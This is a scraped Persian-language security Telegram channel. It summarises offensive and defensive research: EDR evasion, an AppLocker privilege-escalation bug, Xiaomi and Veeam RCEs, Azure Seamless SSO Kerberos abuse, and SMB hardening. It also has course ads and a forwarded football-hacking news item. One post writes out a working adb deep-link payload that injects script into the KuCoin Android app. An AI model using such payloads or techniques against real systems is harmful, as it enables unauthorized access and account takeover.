Security Analysis – Telegram
Security Analysis
11.5K subscribers
344 photos
50 videos
36 files
885 links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Contact : @DrPwner
Download Telegram
⭕️این ابزار که جهت شناسایی و بررسی RootKit ها توسعه داده شده است، با استفاده از درایور ابزار Winpmem که خود نیز قبل تر جزو ابزار Rekall بوده است(اگر Memory Forensics کار کرده باشید احتمالا باهاش آشنا هستید) و مدتی هست بصورت جداگانه توسعه داده شده، اقدام به بررسی موارد خوبی میکند.
یکی از ویژگی هایی که میتوان به آن اشاره کرد امکان متصل کردن به سرور GDB و بررسی فایل مسیر زیر میباشد.
C:\Windows\MEMORY.DMP
خلاصه ی مواردی که این ابزار آنها را بررسی میکند :

Loaded modules list
Drivers in memory code (compared to on-disk version)
Callbacks of kernel objects and internal ntoskrnl lists
PlugAndPlay tree and filters
Kernel types callbacks
FltMgr callbacks
KTimers DPC functions
IRP driver's tables
Driver signing global variables with callbacks
NDIS filters and callbacks
NetIO/FwpkCLNT filtering dispatch
Devices and their attached device objects
IDT entries
PatchGuard initialization and state

#ThreatHunting #RootKit
@securation
⭕️ در پژوهشی جدید از White Knight Labs، استفاده از Vectored Exception Handlers (VEH) برای دور زدن EDR ها مورد بررسی قرار گرفته است.
این تکنیک به جای استفاده مستقیم از Syscalls یا بازنویسی DLL ها، با ایجاد یک Call stack از طریق VEH، امکان دور زدن هوک‌ های EDR در سطح USER را فراهم می‌کند.
این روش، با تنظیم Breakpoints در Opcodes خاص و استفاده از Context CPU، بدون ایجاد Noise، امکان اجرای کد را مهیا می‌سازد.
#RedTeam #EDR #Evasion
@securation
⭕️ استفاده از مدل‌های Large Language Models (LLMs) در کشف آسیب پذیری‌ها به شکل چشمگیری امنیت سایبری را متحول می‌کند، با خودکارسازی شناسایی آسیب‌پذیری‌ها، بهبود تحلیل تهدیدها. این مدل‌های پیشرفته، مانند GPT-4، به طور قابل توجهی بهره‌وری را با اسکن سریع کد، Generating Test Cases و ارائه گزارش‌های دقیق از آسیب‌پذیری‌ها بهبود می‌بخشند.
توانایی آن‌ها در پردازش و تحلیل حجم عظیمی از داده‌ها به متخصصان امنیت کمک می‌کند تا نقاط ضعف احتمالی را به شکل موثرتری شناسایی و رفع کنند. ادغام LLM‌ها در برنامه‌های Bug Bounty نه تنها شناسایی نقص‌های امنیتی را تسریع می‌کند، بلکه فرایند کلی شناسایی تهدیدها را بهینه کرده و در نتیجه، دفاع در برابر تهدیدهای سایبری (Cyber Threats) در حال تکامل را تقویت می‌کند.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/
#LLM
@securation
#DWORD #CPL1

📣 ثبت نام دوره دوم آموزش زبان برنامه نویسی C | سطح مقدماتی و متوسط
◀️با محوریت مهندسی معکوس و برنامه نویسی امن

✈️مشخصات دوره :
⬅️سطح دوره : مقدماتی و متوسط
⬅️تعداد ساعت دوره : 25 ساعت
⬅️نحوه برگزاری : آفلاین ( ویدیو های رکورد شده + پلیر اختصاصی )
⬅️زبان دوره : فارسی و انگلیسی
⬅️تعداد سر فصل : 25
⬅️ارزیابی و مدرک پایان دوره : دارد
⬅️گروه پشتیبانی : دارد

✈️نکات کلیدی دوره :
⬅️آموزش پیشنیاز های لازم و مفاهیم برنامه نویسی
⬅️شامل استاندارد های ANSI C تا C17
⬅️کد نویسی در محیط های برنامه نویسی Visual Studio و Visual Studio Code
⬅️کد نویسی در سیستم عامل های ویندوز و لینوکس
⬅️ساخت برنامه های Cross-Platform
⬅️کار با ابزار های CMake و Automake
⬅️آموزش به صورت پروژه محور و بررسی خلاصه محتوای هر بخش در پایان آن
⬅️حل سوالات مربوط به مصاحبه های کاری و  مرور کردن مطالب در انتهای دوره
⬅️جلسات آنلاین رفع اشکال و پرسش و پاسخ
⬅️مناسب برای تمامی گرایش های نیازمند به زبان برنامه نویسی C

◀️در این دوره فرض بر این گرفته شده که زبان C به عنوان اولین زبانی است که قصد یادگیری آن را دارید. به همین دلیل، تمامی پیش‌نیازها به طور کامل توضیح داده شده‌اند و تمامی بخش‌ها به ریز و با نکات کاربردی بیان شده‌اند.

در هر مرحله از دوره، مفاهیم با جزئیات توضیح داده شده و با مثال‌های عملی و تمرین‌های متنوع پشتیبانی می‌شوند تا یادگیری به بهترین شکل ممکن انجام شود. هدف این است که شما بتوانید با اعتماد به نفس و درک عمیق، برنامه‌نویسی به زبان C را آغاز کنید.

🎁 طبق روال همیشگی، دانشجویان سایر دوره های آکادمی DWORD از تخفیف برخوردار خواهند بود.

🎁 در صورت تمایل به شرکت در دوره و پرداخت شهریه به صورت اقساط با مدرس دوره در ارتباط باشید.


✈️ مشاهده اطلاعات کامل دوره، سرفصل و ثبت نام
🎤 ارتباط با مدرس دوره
▶️ پلی لیست ویدیو های دمو دوره

🦅 کانال بایت امن | گروه بایت امن
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️ ‏اخیراً آسیب‌پذیری جدیدی در درایور AppLocker ویندوز کشف شده است که منجر به ارتقاء سطح دسترسی (LPE) می‌شود.
این نقص به دلیل ارجاع نادرست اشاره‌گر درایور appid.sys در تابع AppHashComputeImageHashInternal() ایجاد می‌شود.
مهاجمان با ارسال یک IOCTL خاص (0x22A018) به Object دستگاه \\Device\\Appid میتوان کنترل کامل بر پوینتر و دیتا موجود در آرگومان اول توسط یک Callback بدست آورد.

چالش هایی که میتوان به آن اشاره کرد:

‏SMEP و kCFG : مهاجم باید از راه‌های دیگری برای حمله استفاده کند، زیرا اجرای مستقیم کد کاربر ممنوع است.
‏KASLR: با استفاده از syscall NtQuerySystemInformation() مهاجم می‌تواند آدرس‌های لازم کرنل را دریافت کند.
بارگذاری درایور: درایور به صورت پیش‌فرض بارگذاری نمی‌شود و باید به صورت دستی بارگذاری گردد.

و در آخر مهاجم می‌تواند با استفاده از دو روش مختلف این آسیب‌پذیری را بهره‌برداری کند:

تغییر فیلد PreviousMode یک KTHREAD هدف و استفاده از syscalls برای دسترسی خواندن/نوشتن دلخواه در فضای کرنل.
تغییر ساختار _SEP_TOKEN_PRIVILEGES توکن فرآیند جاری برای فعال کردن SeDebugPrivilege.


#RedTeam #LPE #Vulnerability_Analysis
@securation
⭕️ چند بلاگ پست خوب در رابطه با نحوه دیباگ داینامیک لایبرری Native اپ های اندرویدی توسط IDA ، GDB و JEB

📎 Blog1 | Blog2 | Blog3 | Blog4

#Android #RE #GDB #IDA #JEB
@Securation
⭕️ افتا Wallix رو ممنوع کرد و ما خیلی خوشحال میشیم یک متخصص (البته اگر افتا همچین کسی رو داشته باشه) ، بیاد یک لایو بذاره و توضیحاتی بده چرا باید همچین محصول خیلی خوبی رو ممنوع کنه؟
-همچنین افتا استفاده از محصولات Eset و Symantec رو هم ممنوع اعلام کرد.

طوری که من شنیدم شرکت های رانتی/امنیتی که بنام "بومی سازی" دارن فعالیت میکنند پشت پرده این حرکات غیرفنی-عقلانی در افتا هست.
نکته جالبتر این هست که محصولات شرکت جاسوسی-امنیتی Positive Technology روسیه رو قراره بیارن جا بندازن توی زیرساخت دولت ایران:)
چرا ؟ چون میگن با قوانین حاکمیت مشکلی نداره و می‌پذیرد که در ایران نمایندگی رسمی داشته باشد و طبق قوانین ایران عمل کند.
+نخندید ولی فکر کنید بگن Kaspersky از روسیه ممنوعه ولی از Positive Technology از روسیه ممنوع نیست.

خب بیاید کشور رو دو دستی تقدیم روسیه کنید چرا قوانین گاو در آوردی در میارین.

#افتا #کسپر #جاسوسی
#PTsecurity
@securation
👍1
Media is too big
VIEW IN TELEGRAM
⭕️ RCE on Xiaomi 13 Pro (CVE-2023-26324)

👉Exploitation:
1) Open URL in WebView
2) Inject JavaScript
3) Execute JavaScript Interface functions from vulnerable GetApps to install & launch payload
4) Get shell

📎 Slides with PoC: DL-Link

#Android
@Securation
⭕️ پس از ارایه نسخه‌های Windows 11 24H2 و Windows Server 2025 ویژگی های امنیتی به SMB اضافه شد که در لیست زیر به تعدادی از آن ها و استفاده درست آن میپردازیم:

SMB signing required by default

SMB Sign اکنون به‌صورت پیش‌فرض برای تمام اتصالات ورودی و خروجی SMB در Windows 11 24H2 و تمام اتصالات خروجی در Windows Server 2025 الزامی شده است. قبلاً، Signing فقط در موارد خاصی مانند Share های SYSVOL و NETLOGON الزامی بود.


SMB NTLM blocking

اکنون، SMB Client از مسدودسازی احراز هویت NTLM برای اتصالات خروجی از راه دور پشتیبانی می‌کند. این ویژگی یک بهبود مهم است زیرا خطرات مرتبط با NTLM مانند حملات Brute force، Relay و Pass-the-hash را کاهش می‌دهد و تضمین می‌کند که فقط احراز هویت Kerberos، که امن‌تر است، استفاده شود.


‏SMB authentication rate limiter

برای مقابله با حملات Brute force، سرویس SMB Server اکنون Rate Limit های ناموفق برای احراز هویت را محدود می‌کند. با یک تاخیر 2 ثانیه‌ای پیش‌فرض بین هر تلاش ناموفق، این ویژگی سرعت مهاجمان را به طور قابل توجهی کاهش می‌دهد و احتمال اینکه از تلاش خود منصرف شوند را افزایش می‌دهد.


SMB insecure guest auth

در Windows 11 Pro، اتصالات Guest و بازگشت به احراز هویت Guest در SMB به‌صورت پیش‌فرض غیرفعال شده است، که این نسخه را با نسخه‌های دیگر مانند Enterprise و Education هماهنگ می‌کند.


‏SMB over QUIC in Windows Server all editions
SMB بر روی QUIC که قبلاً فقط در نسخه Azure Edition در دسترس بود، اکنون در تمام نسخه‌های Windows Server 2025 گنجانده شده است. این ویژگی امکان ارتباط امن SMB بر روی شبکه‌های غیرمطمئن با استفاده از TLS 1.3 را فراهم می‌کند، که آن را برای کاربران موبایل و راه دور ایده‌آل می‌سازد، بدون نیاز به VPN.


‏SMB dialect management‏


‏SMB client encryption mandate now supported

Remote Mailslots deprecated and disabled

SMB over QUIC client access control

SMB alternative ports

SMB Firewall default port changes

SMB auditing improvments


‏با ترکیب این ویژگی ها تا حد ممکنه پروتکل SMB امن خواهد شد.

#Hardening #SMB
@securation
Forwarded from فوتبال ۳۶۰
منچستر قرمز است!
😱 وقتی توییتر امباپه هک می‌شود

‼️ بامداد امروز اکانت رسمی کیلین امباپه در توییتر هک شد و توییت‌های عجیبی با نام او منتشر شد!

💬 «منچستر قرمز است!»

💬 «سال ۲۰۲۸ در انتقالی رایگان به منچستریونایتد می‌روم.»

💬 «کریستیانو رونالدو بهترین بازیکن تاریخ فوتبال است. مسی اسطوره من نیست.»

پس از ساعاتی اکانت توییتر ستاره رئال مادرید بازیابی شد و به حالت اولیه بازگشت.

@Ft360_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
معرفی دوره های آموزشی آکادمی DWORD - ( دوره های آفلاین )

▪️دوره آموزش مهندسی معکوس نرم افزار سطح مقدماتی - متوسط | دوره پنجم

▪️دوره آموزش زبان برنامه نویسی اسمبلی ویندوز | سطح مقدماتی - متوسط

▪️دوره آموزش برنامه نویسی سیستمی ویندوز | سطح پیشرفته

▪️دوره آموزش برنامه نویسی C ویندوز و لینوکس | سطح مقدماتی - متوسط

🖥 امکان ثبت نام در دوره ها به صورت اقساط و همچنین تخفیف 10% برای دانشجویان سابق آکادمی فراهم هست. تمامی دوره ها گروه پشتیبانی جهت پرسش و پاسخ دارند.


🦅
کانال بایت امن | گروه بایت امن
_
⭕️ ‏Pynt یک پلتفرم تست امنیتی API است که به توسعه‌دهندگان و تیم‌های امنیتی کمک می‌کند تا امنیت API ها را به صورت خودکار و در مراحل اولیه توسعه، ارزیابی و تضمین کنند. این پلتفرم به طور ویژه برای پوشش خلأ های امنیتی API طراحی شده و ویژگی‌های منحصربه‌فردی را برای این منظور ارائه می‌دهد.

از ویژگی های آن:


خودکارسازی تست‌های امنیتی API:

Pynt به ما این امکان را میدهد تا تست‌های امنیتی را به صورت خودکار بر روی API ها اجرا کنید. این تست‌ها بر اساس سناریوهای واقعی حمله مانند تزریق کد و حملات scraping اجرا می‌شوند و از این طریق به شناسایی و رفع آسیب‌پذیری‌ها قبل از تولید کمک می‌کنند.


‏Context-Aware Testing:

‏Pynt از تحلیل‌های مختلف برای درک بهتر کارکردهای خاص API ها و نحوه تعامل آن‌ها با فرآیندهای تجاری استفاده می‌کند. این قابلیت کمک می‌کند تا آسیب‌پذیری‌های خاصی که ممکن است در تست‌های استاندارد نادیده گرفته شوند، شناسایی شوند.


‏Zero False Positives:

‏یکی از مواردی که ادعا کرده این ابزار دقت بالای آن در تشخیص آسیب‌پذیری‌ها بدون ایجاد خطا است.


پشتیبانی از OWASP Top 10 و لیست‌های امنیتی دیگر:

با استفاده از استانداردهای OWASP و سایر استاندارد های امنیتی،اقدام به بررسی میکند.


ادغام با ابزارهای توسعه و CI/CD:
‏این پلتفرم به راحتی با ابزارهای محبوب توسعه API مانند Postman و BurpSuite و سیستم‌های CI/CD ادغام می‌شود، که به توسعه‌دهندگان امکان می‌دهد امنیت API ها را به‌صورت مستقیم در جریان توسعه بررسی کنند.


ارائه گزارش‌های کامل و Remediation Paths:

‏ گزارش‌های کاملی از آسیب‌پذیری‌ها همراه با پیشنهادات رفع مشکل و تیکت‌های خودکار ارائه می‌دهد که این فرآیند را برای تیم‌های امنیتی و توسعه‌دهندگان ساده‌تر می‌کند.


پشتیبانی از انواع مختلف API ها:
از انواع مختلف API ها شامل REST، SOAP، و GraphQL پشتیبانی می‌کند، و با توجه به نیازهای خاص هر نوع API، تست‌های مربوطه را انجام می‌دهد.
در آخر میتوان در نسخه های trial و تجاری از آن استفاده کرد.

#AppSec #APISecurity
@securation
⭕️ اگر به ساختار Azure و ارتباط معماری های On-perm با آن رجوع کرده باشید، خواهید دانست که سرویس Seamless SSO با استفاده از تیکت های Kerberos Active Directory محلی اقدام به دسترسی Azure و سرویس 365 میکند.
در ادامه این سرویس با استفاده از تیکت ارسال شده یک Computer Account به اسم AZUREADSSOACC با SPN های خاص ایجاد میکند،
که در زمان Validate شدن با Entra ID server مورد استفاده قرار میگیرد.
حال اگر با دیدگاه RedTeam به آن دقت کنیم متوجه چند مورد خواهیم شد:
در صورت نبود Credential به شکل Clear-text، ما به سه شکل میتوانیم با استفاده از این تکنیک و ابزار SeamlessPass به دسترسی برسیم:

در حالت اول ما TGT یا KRBTGT را دارا هستیم که با Golden,Diamond,و ازین قبیل حملات، اقدام به تولید TGS میکنیم و ادامه ماجرا.

در حالت دوم ما NTML Hash و یا AES key را دارا هستیم، که اقدام به دریافت TGT و TGS میکنیم و ادامه ماجرا.

و در حالت سوم ما NTLM Hash و AES Key اکانت AZUREADSSOACC که پیش تر صحبت شد را دارا هستیم، که میتوان TGS تولید کند و بدون هیچ تعاملی با DC، در Azure احراز هویت کند.

در ادامه با دسترسی به محیط مربوطه با استفاده از ROADTools و AADInternals میتوان اقدام به Enumeration و Exploitation کرد.

#RedTeam #Azure #Cloud
@securation
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ اکسپلویت DeepLink و جاوا اسکریپت اینترفیس و بدست آوردن دسترسی غیرمجاز در اپ اندروید صرافی کوکوین

در این حمله اتکر توانایی باز کردن پوزیشن ترید و همچنین بستن ترید های باز داخل اپ اندرویدی را تنها با کلیک کردن بر روی یک لینک بدست می آورد

adb shell am start   -d 'kucoin:///link?data=\<noscript\>document.write\(\"\<iframe src=https://www.example.com style=position:fixed;top:0;left:0;width:100%;height:100%;border:none;\>\<\/iframe\>\"\)\;\</noscript\>'

📎 BlogPost

@Securation
#Android
Media is too big
VIEW IN TELEGRAM
#Course #DWORD

🖥ویدیو معرفی دوره برنامه نویسی تهاجمی مختص به تیم های قرمز

📊بررسی کامل دوره، سرفصل ها و موضوعاتی که در هر فصل بیان خواهند شد.

آخرین بروزرسانی سرفصل ها : 18 September 2024

🖥شهریه دوره ۱۵,۰۰۰,۰۰۰ تومان است که با ۲۰٪ تخفیف به ۱۰ نفر اول ارائه می‌شود.
📑همچنین، امکان پرداخت به صورت اقساط نیز فراهم است.

🖥نحوه شرکت در دوره :
به دلیل ظرفیت محدود کلاس، اولویت ثبت‌نام با دانشجویانی است که آزمون تعیین سطح را گذرانده باشند. چنانچه پیش‌نیازهای لازم برای شرکت در دوره را ندارید، همچنان می‌توانید در دوره شرکت کنید، اما ابتدا باید این پیش‌نیازها را بگذرانید. جهت دریافت اطلاعات بیشتر به آیدی @YMahmoudnia پیغام بدین.

🦅 کانال بایت امن | گروه بایت امن
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️ به تازگی یک آسیب‌پذیری در نسخه‌های 12.1.2.172 و قدیمی‌تر نرم‌افزار Veeam Backup شناسایی شده که منجر به RCE از طریق Deserialization و دور زدن مکانیزم‌های امنیتی می‌شود.

نرم‌افزار Veeam در ارتباطات خود به DotNet Remoting متکی است که یک API برای ارتباطات IPC و گاهی RPC به حساب می‌آید. در این ارتباطات، برای Serialize کردن داده‌ها، دو روش موجود است، اما در Veeam از روش BinaryFormatter استفاده می‌شود.

آسیب‌پذیری اصلی در کلاس CBinaryServerFormatterSink رخ می‌دهد که به دلیل عدم اعتبارسنجی مناسب نوع ورودی‌ها، امکان سوءاستفاده از آن وجود دارد.
هرچند کلاس‌های CWhitelist و CBlacklist برای جلوگیری از مشکلات Deserialization طراحی شده‌اند، اما این آسیب‌پذیری به دلیل Misconfiguration در این کلاس‌ها قابل دور زدن است.
این مسئله در نهایت به ترکیب این کلاس‌های آسیب‌پذیر با سایر اجزای سیستم منجر به RCE می‌شود.

همچنین، برای دور زدن احراز هویت و دسترسی به پیام‌های ارسالی در کانال ارتباطی، از Interface IServerChannelSink استفاده می‌شود که بخشی از زیرساخت DotNet Remoting است.

https://github.com/watchtowrlabs/CVE-2024-40711
#RedTeam #vulnerability_Analysis #Exploitation
@securation
Forwarded from Security Analysis
دوستان عزیز گروه تبادل دانش امنیت اطلاعات لینکش اینه :
https://news.1rj.ru/str/DarkPwners

لطفا قبل شروع گفتگو یا ارسال مطلب ، قوانین گروه رو مطالعه کنید.
This media is not supported in your browser
VIEW IN TELEGRAM
#Session

🖥 ویدیو جلسه اول | "دوره برنامه نویسی تهاجمی"

مدت زمان :5 دقیقه
🔗 لینک دانلود مستقیم

💠فصل اول : Offensive Programming: Core Concepts

⬅️تعریف برنامه نویسی تهاجمی
⬅️اهداف، تکنیک ها و مهارت های مورد نیاز برنامه نویسی تهاجمی
⬅️هدف اصلی دوره

🦅 کانال بایت امن | گروه بایت امن
_
Please open Telegram to view this post
VIEW IN TELEGRAM
Media is too big
VIEW IN TELEGRAM
#Session

🖥 ویدیو جلسه دوم | "دوره برنامه نویسی تهاجمی"

مدت زمان :30 دقیقه
🔗 لینک دانلود مستقیم

💠فصل اول : Offensive Programming: Core Concepts

⬅️چه زبان برنامه‌نویسی برای برنامه‌نویسی تهاجمی مناسب است؟
⬅️بررسی موارد و فاکتورهای انتخاب زبان برنامه‌نویسی
⬅️بررسی یک زبان برنامه‌نویسی از ابعاد General، Technical و Special Usage
⬅️بررسی دو مورد مهم از دید مکانیسم‌های امنیتی در جهت تحلیل باینری‌ها
⬅️دموی بررسی نحوه فراخوانی یک API و ارتباط آن با جداول Import

🦅 کانال بایت امن | گروه بایت امن
_
Please open Telegram to view this post
VIEW IN TELEGRAM
Media is too big
VIEW IN TELEGRAM
⭕️ حل چالش مهندسی معکوس اپلیکیشن اندروید با موبایل.
چالش Milad Tower در مسابقات Olympics CTF

#Reverse #Android #CTF
#OlympicCTF
@Securation